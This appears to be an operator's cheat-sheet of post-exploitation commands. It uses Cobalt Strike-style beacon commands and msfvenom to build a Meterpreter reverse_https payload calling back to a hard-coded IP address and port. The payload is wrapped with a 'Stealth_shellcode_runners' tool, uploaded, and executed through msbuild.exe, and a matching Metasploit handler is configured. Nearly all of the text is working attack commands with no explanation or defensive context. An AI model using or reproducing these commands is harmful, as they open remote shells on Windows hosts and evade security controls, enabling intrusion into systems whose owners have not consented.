powerpick ipconfig /all
execute-assembly </path/to/executable.exe>
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=51.250.71.227 LPORT=4334 -f raw -o meter.bin
python3 inside_tools/Stealth_shellcode_runners/msbuild_xml meter.bin
beacon> upload /home/administrator/SF/Stealth_shellcode_runners/msbuild_xml/payload.xml
msfconsole -q -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_https;set EXITFUNC thread;set LHOST 51.250.71.227;set LPORT 4334;run;"
powerpick c:\\\\Windows\\\\[Microsoft.NET](<http://microsoft.net/>)\\\\Framework64\\\\v4.0.30319\\\\msbuild.exe "C:\\Users\\public\\tmp\\payload.xml"
GitHub - kymb0/Stealth_shellcode_runners



‘

